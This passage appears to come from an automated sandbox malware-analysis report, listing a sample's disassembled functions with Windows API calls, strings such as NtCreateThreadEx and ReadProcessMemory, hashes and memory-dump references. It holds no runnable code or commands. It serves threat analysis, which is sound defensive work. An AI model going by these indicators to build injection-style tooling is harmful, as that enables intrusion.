                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID: ZwQueryInformationThread
                                                                • API String ID: 97706510-1369173291
                                                                • Opcode ID: 0a3ee4fed2c8ce44732b8724ede729ce30fc5c293cf3a2399e430442a0bdce9f
                                                                • Instruction ID: 28c34d819d99a620a6dbfae205b49112b65cf5ed733fe33ab88b9bfd350a384f
                                                                • Opcode Fuzzy Hash: 0a3ee4fed2c8ce44732b8724ede729ce30fc5c293cf3a2399e430442a0bdce9f
                                                                • Instruction Fuzzy Hash: 8FC13FB5E40309AFDB00DF95C8C2B9DBBB0AF48315F10802AE518FB391E7759A518F96
                                                                Function 0040C22C Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 186memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040C2B2
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000001), ref: 0040C405
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$AllocFree
                                                                • String ID: %02X
                                                                • API String ID: 2012307162-436463671
                                                                • Opcode ID: 348af9b981f95cd05340e47a5fab6030ef99a59052c5399de07684c23dbcc99d
                                                                • Instruction ID: f820671e8e1b72b8661a0b0d3ff940cad85c19a75f7646971955c3b9f8efaa7c
                                                                • Opcode Fuzzy Hash: 348af9b981f95cd05340e47a5fab6030ef99a59052c5399de07684c23dbcc99d
                                                                • Instruction Fuzzy Hash: D05192B1E00318EBDB00EF91ECD6BAEBBB4FF08704F50406AE545B6282D7755A608759
                                                                Function 00500468 Relevance: 4.7, APIs: 3, Instructions: 178COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ___from_strstr_to_strchr.LIBCMT ref: 005004AE
                                                                • _strrchr.LIBCMT ref: 005004B9
                                                                  • Part of subcall function 00500918: _swscanf.LIBCMT ref: 005009E1
                                                                • _sprintf.LIBCMT ref: 005005E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ___from_strstr_to_strchr_sprintf_strrchr_swscanf
                                                                • String ID:
                                                                • API String ID: 4156322039-0
                                                                • Opcode ID: a232865a14efafa4031ecc2264e99cddb451be3a93087fce55aebd1986ee227b
                                                                • Instruction ID: 98b2b6ef30d8a2abc5f55b3005c0b96c9beec08c3fd79234439ca0752c8596ce
                                                                • Opcode Fuzzy Hash: a232865a14efafa4031ecc2264e99cddb451be3a93087fce55aebd1986ee227b
                                                                • Instruction Fuzzy Hash: E661F631A0024A9ACF15CF78D8907E9FB70BF99314F04C29AD85D57382EB35559ACB60
                                                                Function 0042827E Relevance: 4.6, APIs: 3, Instructions: 75serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0042E480: Sleep.KERNEL32(80000301,00426E6B,00000001,00000FA0,00000000,80000301), ref: 0042E489
                                                                • ControlService.ADVAPI32(00000000,00000004,?,00000000), ref: 004281E9
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00428222
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0042824E
                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000), ref: 004282E1
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0042830D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$ControlSleep
                                                                • String ID:
                                                                • API String ID: 2838030454-0
                                                                • Opcode ID: 5c76f451e7895eef559d2f7fd1648643742de301721789c67c4d333581bd3a50
                                                                • Instruction ID: 9c82d7141dc97e90364c366040459eb9b9caf9826acf166fbad779250739215e
                                                                • Opcode Fuzzy Hash: 5c76f451e7895eef559d2f7fd1648643742de301721789c67c4d333581bd3a50
                                                                • Instruction Fuzzy Hash: FD11B470F46315BBD7009F41FD47B7DB634DB06715F50106AF2087A181DABA4A509AAF
                                                                Function 004269F5 Relevance: 4.6, APIs: 3, Instructions: 75serviceCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0042E480: Sleep.KERNEL32(80000301,00426E6B,00000001,00000FA0,00000000,80000301), ref: 0042E489
                                                                • ControlService.ADVAPI32(00000000,00000004,?,00000000), ref: 00426960
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426999
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 004269C5
                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000), ref: 00426A43
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426A6F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$ControlSleep
                                                                • String ID:
                                                                • API String ID: 2838030454-0
                                                                • Opcode ID: 29f996ce849e4bc8de920b269222e43aa67c569d2ee89dde9ff2c0a1153f15a1
                                                                • Instruction ID: aa4971f872d8d67db1281ed5f5ec28e7136786273a52719357ff5be130c09f79
                                                                • Opcode Fuzzy Hash: 29f996ce849e4bc8de920b269222e43aa67c569d2ee89dde9ff2c0a1153f15a1
                                                                • Instruction Fuzzy Hash: 9711D3B0F40315BBD7009F41FD43B7EB630EB06725F50106AF6093A191D6BA4A508EAF
                                                                Function 0048E812 Relevance: 4.6, APIs: 3, Instructions: 68windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PeekMessageA.USER32(0048E791,00000000,00000000,00000000,00000001), ref: 0048E852
                                                                • TranslateMessage.USER32(0048E791), ref: 0048E886
                                                                • DispatchMessageA.USER32(0048E791), ref: 0048E8B2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$DispatchPeekTranslate
                                                                • String ID:
                                                                • API String ID: 4217535847-0
                                                                • Opcode ID: 6f86afd49eb9493887e166ce1be699495c478fa4d613094b07f0bdd60864dbc5
                                                                • Instruction ID: 1e5bd79496006004a2d836a083b3cef8fe694022c7738674edacb5a485c286c2
                                                                • Opcode Fuzzy Hash: 6f86afd49eb9493887e166ce1be699495c478fa4d613094b07f0bdd60864dbc5
                                                                • Instruction Fuzzy Hash: 4211A7B4E40304BBEB10BF919D47B6DBA359B06711F101075F504BB1C1E6758A509B5E
                                                                Function 0040A136 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(?,0041C74B,?,00429A2F), ref: 0040A159
                                                                • RtlAllocateHeap.NTDLL(?,00000000,00000018), ref: 0040A192
                                                                • RtlInitializeCriticalSection.NTDLL ref: 0040A1C6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateCriticalInitializeProcessSection
                                                                • String ID:
                                                                • API String ID: 2106503814-0
                                                                • Opcode ID: 4ca06075b39c7fee177ea6daca90cbd81469fb16033431a87bf5c582d0e1f86c
                                                                • Instruction ID: d0e7b6aa85a11e826f688ccae043789bd2029ef56c0dd2b1dd38e333951a52b0
                                                                • Opcode Fuzzy Hash: 4ca06075b39c7fee177ea6daca90cbd81469fb16033431a87bf5c582d0e1f86c
                                                                • Instruction Fuzzy Hash: 9E019E30E84704BBD710AF60AD0777DBA34A713712F2050BAF5087E2E0DAB51664DB8E
                                                                Function 0040421D Relevance: 3.9, APIs: 3, Instructions: 151stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • strlen.MSVCRT ref: 00404290
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000,00000000,00000000), ref: 004042F7
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,FFFFFFFF,?,00000000,00000000), ref: 00404394
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$strlen
                                                                • String ID:
                                                                • API String ID: 3468603845-0
                                                                • Opcode ID: 8a875e31f46d09a251127f74f66463ba3538fd657eeeff8d435644ad433cbc1b
                                                                • Instruction ID: 54fd5ee7f4b538d1b53c2f26ad978a62514ba69baf5fc9b22066551dc07c41f7
                                                                • Opcode Fuzzy Hash: 8a875e31f46d09a251127f74f66463ba3538fd657eeeff8d435644ad433cbc1b
                                                                • Instruction Fuzzy Hash: 7E5173B1F00318ABDF00EF95EC82BAFBBB4AB05310F14117AF604B62D1D7795A548B99
                                                                Function 004AE63F Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 370synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(00000000,FFFFFFFF,?,?,?,?,?,?,00000000), ref: 004AEAFC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ObjectSingleWait
                                                                • String ID: NtCreateThreadEx
                                                                • API String ID: 24740636-544425562
                                                                • Opcode ID: 9e4945cc960e750403b6fe6ffcac5c8bcd7cca14399f24ee4e5e51a6ef31b45f
                                                                • Instruction ID: c37ffc29444e33f3ff00cc18c8a21f9aac96c1ba7796cdb64a680e5a8e7d07e7
                                                                • Opcode Fuzzy Hash: 9e4945cc960e750403b6fe6ffcac5c8bcd7cca14399f24ee4e5e51a6ef31b45f
                                                                • Instruction Fuzzy Hash: 76E15CB5E403199FEF00DF95CD86B9EB7B0BB5D305F14812AE518BB382D3B999008B65
                                                                Function 004828FE Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 229COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004809EB: ReadProcessMemory.KERNEL32(00000000,004807B0,00000000,00000004,00000000,?,004807B0), ref: 00480A19
                                                                • CallWindowProcA.USER32(00668787,?,?,00000003,00000000), ref: 00482BB1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CallMemoryProcProcessReadWindow
                                                                • String ID: ,
                                                                • API String ID: 95754710-3772416878
                                                                • Opcode ID: 17bfe06ce3c7fa1266ffe656bb193b554296bb9f2af6dda487940d130ad2ae0d
                                                                • Instruction ID: 496d6bbc2f7389c45bbb32b2e5d8a22688c85449eb1c0765f21ab55a717bde17
                                                                • Opcode Fuzzy Hash: 17bfe06ce3c7fa1266ffe656bb193b554296bb9f2af6dda487940d130ad2ae0d
                                                                • Instruction Fuzzy Hash: 9A91E3B4E00219AFDB00DF95DDC6BAEBBB4FB0D304F10046AE605BB392D6756A50CB65
                                                                Function 004A030F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004A0361
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID: \\.\\
                                                                • API String ID: 823142352-4229562784
                                                                • Opcode ID: 610cf800ddec33a2bc946201fe505ba8cb29fb1fc5c20fb954b5c6bd1b52cfe8
                                                                • Instruction ID: 4bcb1ec4efeb86d7944cc9a7249a55586db4c25a0c444e08acbc7df7b3b5df18
                                                                • Opcode Fuzzy Hash: 610cf800ddec33a2bc946201fe505ba8cb29fb1fc5c20fb954b5c6bd1b52cfe8
                                                                • Instruction Fuzzy Hash: E9116D70A40308BBDB10DF94DCC2B6DBB74EB1A310F104165EA08AB3C1D2759A109B66
                                                                Function 0046413F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004641F5: GetCursorPos.USER32(00000000), ref: 0046426D
                                                                • WindowFromPoint.USER32(00000000,?), ref: 004641B2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CursorFromPointWindow
                                                                • String ID: 0AF
                                                                • API String ID: 3701901767-2918688355
                                                                • Opcode ID: c4bcccd17560bc7202000e7ac65af2879be068d506580375c1212307478b9ab3
                                                                • Instruction ID: b09f151b188699e6a3c911f4bb5e529282b0bf9f5deb74a391832fd6376813f7
                                                                • Opcode Fuzzy Hash: c4bcccd17560bc7202000e7ac65af2879be068d506580375c1212307478b9ab3
                                                                • Instruction Fuzzy Hash: 1B11FBB5E00208FFDB40DF98DD85BAEBBB4BB09304F1440A9E508BB242E7756B149F56
                                                                Function 00446B2B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualProtect.KERNEL32(00000040,00000001,?,00000000), ref: 00446B8B
                                                                Strings
                                                                Memory Dump Source
